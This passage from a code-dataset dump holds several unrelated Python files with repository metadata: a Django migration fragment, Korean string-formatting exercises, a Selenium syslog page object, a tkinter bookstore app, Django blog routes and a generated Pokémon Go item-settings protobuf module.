91), (93, 92), (94, 93), (95, 94), (96, 95), (97, 96), (98, 97), (99, 98), (100, 99), (101, 100)])), ('created_at', models.DateTimeField(auto_now_add=True)), ('updated_at', models.DateTimeField(auto_now=True)), ('building', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Building')), ('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='PlayerResouce', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('amount', models.PositiveIntegerField(default=0)), ('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Resources', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('type', models.CharField(max_length=255, unique=True)), ], options={ 'verbose_name_plural': 'Resources', }, ), migrations.AddField( model_name='playerresouce', name='resource', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='first_draft.Resources'), ), migrations.AlterUniqueTogether( name='playerbuilding', unique_together=set([('player', 'building')]), ), ]
8ad2bcbe89aa890553ba807bcca337ba1fcecfa0
50e4a9f7d2126d0bee1b97126e9a60de7314ccce
/iot/chapter3/ex08-03.py
7beb00abdc05afdf5bc8438b56a9a5a28e4d2f39
[]
no_license
heohyoyeong/test_python_basic
649d5a0ed671a883885c52033a24362149435114
1ef9583e7e1bd735c15b0f6af57f39809b041403
refs/heads/master
2022-11-21T09:13:08.632555
2020-07-29T02:21:11
2020-07-29T02:21:11
283,376,126
0
0
null
null
null
null
UTF-8
Python
false
false
2,047
py
def main(): s= "독도는 일본땅. 대마도도 일본땅" print(s) print(s.replace("일본","한국")) print(s) def main2(): message="안녕하세요" print(message.center(30)) print(message.ljust(30)) print(message.rjust(30)) def main3(): trabler = """ 강나루 거너서 밀밭 길을 구름에 달 가듯이 가는 나그네 """ poet= trabler.splitlines() for line in poet: print(line.center(30)) def main4(): price= 500 print("궁금하면" + str(price)+ "원!") mon=8 day=15 anni="광복절" print("%d월 %d일은 %s이다."%(mon,day,anni)) def main5(): value=123 print("###%d###"%value) print("###%5d###" % value) print("###%10d###" % value) print("###%-10d###" % value) print("###%1d###" % value) def main6(): price= [30,13500,2000] for p in price: print("가격 : %d원"%p) print for p in price: print("가격 : %7d원"%p) print for p in price: print("가격 : %-7d원"%p) print def main7(): f=123.1234567 print("%10f" % f) print("%10.8f" % f) print("%10.5f" % f) print("%10.2f" % f) print("%.2f" % 123.126) def main8(): name= "한결" age=16 height= 178.8 print("이름:{}, 나이: {}, 키: {}".format(name,age,height)) print("이름:{:s}, 나이: {:d}, 키: {:f}".format(name, age, height)) print("이름:{:4s}, 나이: {:3d}, 키: {:.2f}".format(name, age, height)) def main9(): name = "한결" age = 16 height = 162.5 print("이름:{0}, 나이: {1}, 키: {2}".format(name, age, height)) print("이름:{2}, 나이: {1}, 키: {0}".format(height, age, name)) print("이름:{name}, 나이: {age}, 키: {height}".format(age=20, height=160.9,name="길동")) def main10(): name="한결" age= 16 height= 162.5 print(f"이름: {name}, 나이:{age}, 키:{height:.2f}") # main() # main2() # main3() # main4() # main5() # main6() # main7() # main8() # main9() # main10()
1a72065a811121f0dd9d16e8dd072b751fba6a6a
917a99fdf14097dd8001b5c98cc48c8716f8f969
/webElement/ass_service/syslogElement.py
8bffc624415e17423f022ce3b8b9a646794ed0be
[]
no_license
isomper/testIsomptySecret
722eba4cbefe9495a3292d8d10e8ad9c4a34c8a7
968bbee05af730cfb7717f1531286f11a7f99cf3
refs/heads/master
2020-03-19T07:29:28.487913
2018-07-13T06:25:50
2018-07-13T06:25:50
136,118,583
0
0
null
null
null
null
UTF-8
Python
false
false
4,408
py
#coding=utf-8 u''' #文件名: #被测软件版本号:V2.8.1 #作成人:李择优 #生成日期:2018/1/24 #模块描述:SYSLOG #历史修改记录 #修改人: #修改日期: #修改内容: ''' import sys reload(sys) sys.setdefaultencoding('utf-8') import time sys.path.append("/testIsompSecret/common/") from _icommon import getElement,selectElement,frameElement,commonFun from _cnEncode import cnEncode from _log import log sys.path.append("/testIsompSecret/webElement/ass_service/") from ntpElement import NtpService class Syslog: #运行状态开关 SWITCH = "btn_qh" #IP HOST = "host" #端口 PORT = "port" #协议 PROTOCOL = "protocol" #标识 IDENT = "ident" #机制 FACILITY = "facility" #测试按钮 TEST_BUTTON = "test_syslog" #保存按钮 SAVE_BUTTON = "save_syslog" def __init__(self,driver): self.driver = driver self.log = log() self.getElem = getElement(driver) self.select = selectElement(driver) self.frameElem = frameElement(driver) self.cmf = commonFun(driver) self.ntp = NtpService(driver) self.cnEnde = cnEncode() u'''填写变量内容 parameters: var_text : 变量内容 value : 定位方式值 ''' def set_common_func(self,var_text,value): try: revar_text = self.cnEnde.is_float(var_text) var_elem =self.getElem.find_element_with_wait_EC("id",value) var_elem.clear() var_elem.send_keys(revar_text) except Exception as e: print ("set user common text error: ") + str(revar_text) + str(e) u'''输入IP parameters: setIp : IP ''' def set_ip(self,setIp): return self.set_common_func(setIp,self.HOST) u'''输入端口 parameters: setPort : 端口 ''' def set_port(self,setPort): return self.set_common_func(setPort,self.PORT) u'''选择协议 Parameters: value:select选项中的value属性值,udp代表UDP,tcp代表TCP,nix_syslog代表nix_syslog ''' def set_protocol(self, value): valu = self.cnEnde.is_float(value) self.frameElem.from_frame_to_otherFrame("rigthFrame") selem = self.getElem.find_element_with_wait_EC("id",self.PROTOCOL) self.select.select_element_by_value(selem, valu) u'''输入标识 parameters: setIdent : 标识 ''' def set_ident(self,setIdent): return self.set_common_func(setIdent,self.IDENT) u'''选择机制 Parameters: value:select选项中的value属性值,32代表facility ''' def set_facility(self, value): valu = self.cnEnde.is_float(value) self.frameElem.from_frame_to_otherFrame("rigthFrame") selem = self.getElem.find_element_with_wait_EC("id",self.FACILITY) self.select.select_element_by_value(selem, valu) u'''点击测试按钮''' def test_button(self): self.frameElem.from_frame_to_otherFrame("rigthFrame") self.getElem.find_element_wait_and_click_EC("id",self.TEST_BUTTON) u'''点击保存按钮''' def save_button(self): self.frameElem.from_frame_to_otherFrame("rigthFrame") self.getElem.find_element_wait_and_click_EC("id",self.SAVE_BUTTON) u'''改变开关状态''' def change_switch_status(self): self.frameElem.from_frame_to_otherFrame("rigthFrame") try: button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH) class_attr = button_elem.get_attribute("class") off_status = "switch_off" on_status = "switch_on" if class_attr == on_status: self.ntp.click_left_moudle(1) self.frameElem.from_frame_to_otherFrame("rigthFrame") button_elem = self.getElem.find_element_with_wait_EC("id",self.SWITCH) time.sleep(1) button_elem.click() button_elem.click() else: button_elem.click() except Exception as e: print ("Change button status error: ") + str(e)
65491b4cf6af511302a7fd9c889aaa1981d32a99
69f313e9f97dd50856be74f0f5a13ffad4fc2373
/LibraryFront.py
122cf64f7ed6bb854b053ef54e3c2fee03472a28
[]
no_license
akimbaev/Python_tkinter
f2b9e57601fa068aff71c87be2c861124f48972f
5bf5facc9eb40fb6e8301aa75078b8e53ff50d2d
refs/heads/master
2022-11-15T00:16:27.576341
2020-06-30T14:25:37
2020-06-30T14:25:37
273,231,482
0
2
null
2020-06-26T15:30:17
2020-06-18T12:26:08
Python
UTF-8
Python
false
false
9,760
py
from tkinter import * from LibraryBackend import Database import os.path import tkinter as tk import tkinter.ttk as ttk import matplotlib import pylab matplotlib.use("TkAgg") # from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg from matplotlib.figure import Figure import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib import style import pylab as pl import sqlite3 database = Database("books.db") # with sqlite3.connect('books.db') as conn: # cur = conn.cursor() from models.Item import Item conn = sqlite3.connect("books.db") cur = conn.cursor() from models.Store import Store from models.ShoppingCart import ShoppingCart cart = ShoppingCart() class Window(object): class_var = 1 updated_list=[] def __init__(self,window): self.window = window self.window.wm_title("The Book Store") l1 = Label(window, text="Title") l1.grid(row=0, column=0) l2 = Label(window, text="Author") l2.grid(row=0, column=2) l3 = Label(window, text="Year") l3.grid(row=1, column=0) l4 = Label(window, text="ISBN") l4.grid(row=1, column=2) self.title_text = StringVar() self.e1 = Entry(window, textvariable=self.title_text) self.e1.grid(row=0, column=1) self.author_text = StringVar() self.e2 = Entry(window, textvariable=self.author_text) self.e2.grid(row=0, column=3) self.year_text = StringVar() self.e3 = Entry(window, textvariable=self.year_text) self.e3.grid(row=1, column=1) self.ISBN_text = StringVar() self.e4= Entry(window, textvariable=self.ISBN_text) self.e4.grid(row=1, column=3) self.list1 = Listbox(window, height=6, width=35) self.list1.grid(row=2, column=0, rowspan=6, columnspan=2,padx=5) self.list1.bind('<<ListboxSelect>>', self.get_selected_row) # now we need to attach a scrollbar to the listbox, and the other direction,too sb1 = Scrollbar(window) sb1.grid(row=2, column=2, rowspan=6) self.list1.config(yscrollcommand=sb1.set) sb1.config(command=self.list1.yview) b1 = Button(window, text="View all", width=12, command=self.view_command) b1.grid(row=2, column=3) b2 = Button(window, text="Search entry", width=12, command=self.search_command) b2.grid(row=3, column=3) b3 = Button(window, text="Add entry", width=12, command=self.add_command) b3.grid(row=4, column=3) b4 = Button(window, text="Update selected", width=12, command=self.update_command) b4.grid(row=5, column=3) b5 = Button(window, text="Delete selected", width=12, command=self.delete_command) b5.grid(row=6, column=3) # b6 = Button(window, text="Top searched", width=12, command=self.animate) # b6.grid(row=7, column=3) b6 = Button(window, text="Top searched", width=12, command=self.animate) b6.grid(row=7, column=3) b7 = Button(window, text="Close", width=12, command=window.destroy) b7.grid(row=8, column=3) b8 = Button(window, text="Add to cart ", width=12, cursor="hand2", command=self.addItemToCart) b8.grid(row=9, column=0) b9 = Button(window, text="Go to cart ", width=12, command=self.viewCart) b9.grid(row=9, column=1) def viewCart(self): cartWindow = Toplevel() cartWindow.title("The Cart") cartWindow.grab_set() global cart cartItems = cart.getCartItems() cartItemsLabelFrame = LabelFrame(cartWindow,text="Cart Items") cartItemsLabelFrame.pack(fill="both", expand="yes", padx="20", pady="10") cartItemsFrame = Frame(cartItemsLabelFrame, padx=3, pady=3) cartItemsFrame.pack() index = 0 for item in cartItems: itemFrame = Frame(cartItemsFrame, pady="5") itemFrame.pack(fill="both", expand="yes") nameLabel = Label(itemFrame, text=item.name,font=("Candara",15),fg="blue") priceLabel = Label(itemFrame, text="$ %s"%item.price,font=("Candara",13),fg="red") addToCartBtn = Button(itemFrame, text="Remove From Cart", font=("Candara",11,"bold"),fg="red",bg="white",cursor="hand2", command=lambda i=index: removeFromCart(i,cartWindow) ) nameLabel.pack(side="left") priceLabel.pack(side="left") addToCartBtn.pack(side="right" ) index += 1 checkOutFrame = Frame(cartWindow, pady="10") totalPriceLabel = Label(checkOutFrame, text="Total Price : $ %s" % cart.getTotalPrice(), font=("Candara",14,"bold")) totalPriceLabel.pack(side="left") buyBtn = Button(checkOutFrame, text="Buy Now", font=("Candara",15,"bold"),bg="white",cursor="hand2", command=lambda : buyCommand(cartWindow)) buyBtn.pack(side="left",padx="10") checkOutFrame.pack() backToStoreBtn = Button(cartWindow, text="Back To Store", font=("Candara",15,"bold"),bg="white",cursor="hand2",command=cartWindow.destroy) backToStoreBtn.pack(pady="6") cartWindow.mainloop() def addItemToCart(self): name1=self.title_text.get() store = Store() from models.Item import Item Item.name=name1 Item.price=100 cart.addToCart(Item) # messagebox.showinfo(title="Success" , message="Item %s Added To The Cart !!"%item.name ) def get_selected_row(self,event): #the "event" parameter is needed b/c we've binded this function to the listbox try: index = self.list1.curselection()[0] self.selected_tuple = self.list1.get(index) self.e1.delete(0,END) self.e1.insert(END,self.selected_tuple[1]) self.e2.delete(0, END) self.e2.insert(END,self.selected_tuple[2]) self.e3.delete(0, END) self.e3.insert(END,self.selected_tuple[3]) self.e4.delete(0, END) self.e4.insert(END,self.selected_tuple[4]) except IndexError: pass #in the case where the listbox is empty, the code will not execute def view_command(self): self.list1.delete(0, END) # make sure we've cleared all entries in the listbox every time we press the View all button for row in database.view(): self.list1.insert(END, row) def set_const(self, new_var): Window.class_var = new_var def get_const(self): return Window.class_var def set_new_list(self, new_list): Window.updated_list = new_list def get_updated_list(self): return Window.updated_list def animate(self): try: val = self.get_updated_list() sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)" cur.executemany(sql, val) cur.execute("SELECT COUNT(DISTINCT title) FROM top_book;") num_of_books = cur.fetchall() dist_books = num_of_books[0][0] xs = [] x_book_name=[] ys = [] cur.execute("SELECT title from top_book") for i in range(dist_books): xs.append(i) for i in range(dist_books): one_book=cur.fetchone() x_book_name.append(one_book[0]) cur.execute("SELECT counter from top_book") for i in range(dist_books): one_book_occur=cur.fetchone() ys.append(one_book_occur[0]) #Type1 plt.figure(figsize=(8,6)) plt.suptitle('Categorical Plotting') plt.style.use('ggplot') plt.plot(x_book_name, ys) plt.xticks(rotation=15) conn.commit() plt.show() conn.commit() conn.close() except: print("No data is chosen for building a graph") conn.commit() conn.close() def search_command(self): self.list1.delete(0, END) for row in database.search(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()): self.list1.insert(END, row) cur.execute("SELECT title FROM book") var = cur.fetchall() new_table=[] rrr = self.get_updated_list() if (len(rrr) == 0) : cur.execute("CREATE TABLE IF NOT EXISTS top_book (title VARCHAR(255), counter INTEGER);") get_title = [i[0] for i in var] get_counter = [] for i in range(len(get_title)): if(get_title[i] == self.title_text.get()): get_counter.append(1) else: get_counter.append(0) val = list(zip(get_title, get_counter)) sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)" cur.executemany(sql, val) cur.execute('SELECT * FROM top_book') self.set_new_list(cur.fetchall()) print("came here") conn.commit() new_table = self.get_updated_list() sql = "INSERT INTO top_book (title, counter) VALUES (?, ?)" cur.executemany(sql, list(set(new_table))) cur.execute("SELECT max(counter) FROM top_book WHERE title=?", (self.title_text.get(), )) to_increment = cur.fetchall()[0][0] cur.execute("""UPDATE top_book SET counter = counter + 1 WHERE title = ? and counter=?""", (self.title_text.get(),to_increment)) cur.execute("SELECT * FROM top_book") list_to_save = cur.fetchall() self.set_new_list(list(set(list_to_save))) print(list(set(list_to_save))) conn.commit() return list(set(list_to_save)) conn.close() def add_command(self): database.insert(self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()) self.list1.delete(0, END) self.list1.insert(END, (self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get())) def delete_command(self): database.delete(self.selected_tuple[0]) self.view_command() def update_command(self): #be careful for the next line ---> we are updating using the texts in the entries, not the selected tuple database.update(self.selected_tuple[0],self.title_text.get(), self.author_text.get(), self.year_text.get(), self.ISBN_text.get()) self.view_command() #code for the GUI (front end) window = Tk() window.geometry("580x240") Window(window) window.mainloop()
66c6fd7546d0d7ae63a823f1182cfd17e3f29d36
24ff40115475130039eb42c180932fb17feb8f42
/mysite/blog/urls.py
8632bb94424bb026d765670ddfdabc382f4cbac1
[]
no_license
ushnuel/blog_project
1bac23a033ab0d1bd38e034819b2f88b52390640
0816269fefa45c641d2c8413acbcd32b80972651
refs/heads/master
2020-05-18T23:41:25.082360
2019-05-03T06:54:17
2019-05-03T06:54:17
184,717,708
0
0
null
null
null
null
UTF-8
Python
false
false
973
py
from django.conf.urls import url from blog import views urlpatterns = [ url(r'^$', views.PostListView.as_view(), name='post_list'), url(r'^about/$', views.AboutView.as_view(), name='about'), url(r'^post/(?P<pk>\d+)$', views.PostDetailView.as_view(), name='post_detail'), url(r'^post/new/$', views.PostCreateView.as_view(), name='post_new'), url(r'^post/(?P<pk>\d+)/edit/$', views.PostUpdateView.as_view(), name='post_update'), url(r'^post/(?P<pk>\d+)/delete/$', views.PostDeleteView.as_view(), name='post_delete'), url(r'^drafts/$',views.DraftListView.as_view(), name='post_draft_list'), url(r'^post/(?P<pk>\d+)/comment/$', views.add_comment_to_post, name='add_comment_to_post'), url(r'comment/(?P<pk>\d+)/approve/$', views.approve_comment, name='approve_comment'), url(r'comment/(?P<pk>\d+)/remove/$', views.comment_remove, name='comment_remove'), url(r'post/(?P<pk>\d+)/publish/$', views.post_publish, name='post_publish'), ]
1c795934bcbbc615b180f995d41268c824795d6a
9d8f1868aa61ff4f4947d98c8fea905c71dee6b7
/pgoapi/protos/POGOProtos/Settings/Master/ItemSettings_pb2.py
dba8f747c61a7af895af2a2a0abcf3a31087dd73
[ "MIT" ]
permissive
erhan-/pokefarm
5c3a30a5708417ef68c0537ff879d472fb62d774
797ad72d44bdccd2b7a32080d259d187988bd4ab
refs/heads/master
2023-05-24T06:50:52.169989
2021-03-12T12:34:25
2021-03-12T12:34:25
63,973,073
0
0
NOASSERTION
2023-05-22T21:40:56
2016-07-22T17:59:20
Python
UTF-8
Python
false
true
13,742
py
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: POGOProtos/Settings/Master/ItemSettings.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from POGOProtos.Enums import ItemCategory_pb2 as POGOProtos_dot_Enums_dot_ItemCategory__pb2 from POGOProtos.Inventory import ItemId_pb2 as POGOProtos_dot_Inventory_dot_ItemId__pb2 from POGOProtos.Inventory import ItemType_pb2 as POGOProtos_dot_Inventory_dot_ItemType__pb2 from POGOProtos.Settings.Master.Item import FoodAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2 from POGOProtos.Settings.Master.Item import PotionAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2 from POGOProtos.Settings.Master.Item import ReviveAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2 from POGOProtos.Settings.Master.Item import BattleAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2 from POGOProtos.Settings.Master.Item import IncenseAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2 from POGOProtos.Settings.Master.Item import PokeballAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2 from POGOProtos.Settings.Master.Item import FortModifierAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2 from POGOProtos.Settings.Master.Item import EggIncubatorAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2 from POGOProtos.Settings.Master.Item import ExperienceBoostAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2 from POGOProtos.Settings.Master.Item import InventoryUpgradeAttributes_pb2 as POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='POGOProtos/Settings/Master/ItemSettings.proto', package='POGOProtos.Settings.Master', syntax='proto3', serialized_pb=_b('\n-POGOProtos/Settings/Master/ItemSettings.proto\x12\x1aPOGOProtos.Settings.Master\x1a#POGOProtos/Enums/ItemCategory.proto\x1a!POGOProtos/Inventory/ItemId.proto\x1a#POGOProtos/Inventory/ItemType.proto\x1a\x34POGOProtos/Settings/Master/Item/FoodAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/PotionAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/ReviveAttributes.proto\x1a\x36POGOProtos/Settings/Master/Item/BattleAttributes.proto\x1a\x37POGOProtos/Settings/Master/Item/IncenseAttributes.proto\x1a\x38POGOProtos/Settings/Master/Item/PokeballAttributes.proto\x1a<POGOProtos/Settings/Master/Item/FortModifierAttributes.proto\x1a<POGOProtos/Settings/Master/Item/EggIncubatorAttributes.proto\x1a?POGOProtos/Settings/Master/Item/ExperienceBoostAttributes.proto\x1a@POGOProtos/Settings/Master/Item/InventoryUpgradeAttributes.proto\"\xab\x07\n\x0cItemSettings\x12-\n\x07item_id\x18\x01 \x01(\x0e\x32\x1c.POGOProtos.Inventory.ItemId\x12\x31\n\titem_type\x18\x02 \x01(\x0e\x32\x1e.POGOProtos.Inventory.ItemType\x12\x30\n\x08\x63\x61tegory\x18\x03 \x01(\x0e\x32\x1e.POGOProtos.Enums.ItemCategory\x12\x11\n\tdrop_freq\x18\x04 \x01(\x02\x12\x1a\n\x12\x64rop_trainer_level\x18\x05 \x01(\x05\x12\x45\n\x08pokeball\x18\x06 \x01(\x0b\x32\x33.POGOProtos.Settings.Master.Item.PokeballAttributes\x12\x41\n\x06potion\x18\x07 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.PotionAttributes\x12\x41\n\x06revive\x18\x08 \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.ReviveAttributes\x12\x41\n\x06\x62\x61ttle\x18\t \x01(\x0b\x32\x31.POGOProtos.Settings.Master.Item.BattleAttributes\x12=\n\x04\x66ood\x18\n \x01(\x0b\x32/.POGOProtos.Settings.Master.Item.FoodAttributes\x12V\n\x11inventory_upgrade\x18\x0b \x01(\x0b\x32;.POGOProtos.Settings.Master.Item.InventoryUpgradeAttributes\x12L\n\x08xp_boost\x18\x0c \x01(\x0b\x32:.POGOProtos.Settings.Master.Item.ExperienceBoostAttributes\x12\x43\n\x07incense\x18\r \x01(\x0b\x32\x32.POGOProtos.Settings.Master.Item.IncenseAttributes\x12N\n\regg_incubator\x18\x0e \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.EggIncubatorAttributes\x12N\n\rfort_modifier\x18\x0f \x01(\x0b\x32\x37.POGOProtos.Settings.Master.Item.FortModifierAttributesb\x06proto3') , dependencies=[POGOProtos_dot_Enums_dot_ItemCategory__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemId__pb2.DESCRIPTOR,POGOProtos_dot_Inventory_dot_ItemType__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2.DESCRIPTOR,POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2.DESCRIPTOR,]) _sym_db.RegisterFileDescriptor(DESCRIPTOR) _ITEMSETTINGS = _descriptor.Descriptor( name='ItemSettings', full_name='POGOProtos.Settings.Master.ItemSettings', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='item_id', full_name='POGOProtos.Settings.Master.ItemSettings.item_id', index=0, number=1, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='item_type', full_name='POGOProtos.Settings.Master.ItemSettings.item_type', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='category', full_name='POGOProtos.Settings.Master.ItemSettings.category', index=2, number=3, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='drop_freq', full_name='POGOProtos.Settings.Master.ItemSettings.drop_freq', index=3, number=4, type=2, cpp_type=6, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='drop_trainer_level', full_name='POGOProtos.Settings.Master.ItemSettings.drop_trainer_level', index=4, number=5, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='pokeball', full_name='POGOProtos.Settings.Master.ItemSettings.pokeball', index=5, number=6, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='potion', full_name='POGOProtos.Settings.Master.ItemSettings.potion', index=6, number=7, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='revive', full_name='POGOProtos.Settings.Master.ItemSettings.revive', index=7, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='battle', full_name='POGOProtos.Settings.Master.ItemSettings.battle', index=8, number=9, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='food', full_name='POGOProtos.Settings.Master.ItemSettings.food', index=9, number=10, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='inventory_upgrade', full_name='POGOProtos.Settings.Master.ItemSettings.inventory_upgrade', index=10, number=11, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='xp_boost', full_name='POGOProtos.Settings.Master.ItemSettings.xp_boost', index=11, number=12, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='incense', full_name='POGOProtos.Settings.Master.ItemSettings.incense', index=12, number=13, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='egg_incubator', full_name='POGOProtos.Settings.Master.ItemSettings.egg_incubator', index=13, number=14, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='fort_modifier', full_name='POGOProtos.Settings.Master.ItemSettings.fort_modifier', index=14, number=15, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=779, serialized_end=1718, ) _ITEMSETTINGS.fields_by_name['item_id'].enum_type = POGOProtos_dot_Inventory_dot_ItemId__pb2._ITEMID _ITEMSETTINGS.fields_by_name['item_type'].enum_type = POGOProtos_dot_Inventory_dot_ItemType__pb2._ITEMTYPE _ITEMSETTINGS.fields_by_name['category'].enum_type = POGOProtos_dot_Enums_dot_ItemCategory__pb2._ITEMCATEGORY _ITEMSETTINGS.fields_by_name['pokeball'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PokeballAttributes__pb2._POKEBALLATTRIBUTES _ITEMSETTINGS.fields_by_name['potion'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_PotionAttributes__pb2._POTIONATTRIBUTES _ITEMSETTINGS.fields_by_name['revive'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ReviveAttributes__pb2._REVIVEATTRIBUTES _ITEMSETTINGS.fields_by_name['battle'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_BattleAttributes__pb2._BATTLEATTRIBUTES _ITEMSETTINGS.fields_by_name['food'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FoodAttributes__pb2._FOODATTRIBUTES _ITEMSETTINGS.fields_by_name['inventory_upgrade'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_InventoryUpgradeAttributes__pb2._INVENTORYUPGRADEATTRIBUTES _ITEMSETTINGS.fields_by_name['xp_boost'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_ExperienceBoostAttributes__pb2._EXPERIENCEBOOSTATTRIBUTES _ITEMSETTINGS.fields_by_name['incense'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_IncenseAttributes__pb2._INCENSEATTRIBUTES _ITEMSETTINGS.fields_by_name['egg_incubator'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_EggIncubatorAttributes__pb2._EGGINCUBATORATTRIBUTES _ITEMSETTINGS.fields_by_name['fort_modifier'].message_type = POGOProtos_dot_Settings_dot_Master_dot_Item_dot_FortModifierAttributes__pb2._FORTMODIFIERATTRIBUTES DESCRIPTOR.message_types_by_name['ItemSettings'] = _ITEMSETTINGS ItemSettings = _reflection.GeneratedProtocolMessageType('ItemSettings', (_message.Message,), dict( DESCRIPTOR = _ITEMSETTINGS, __module__ = 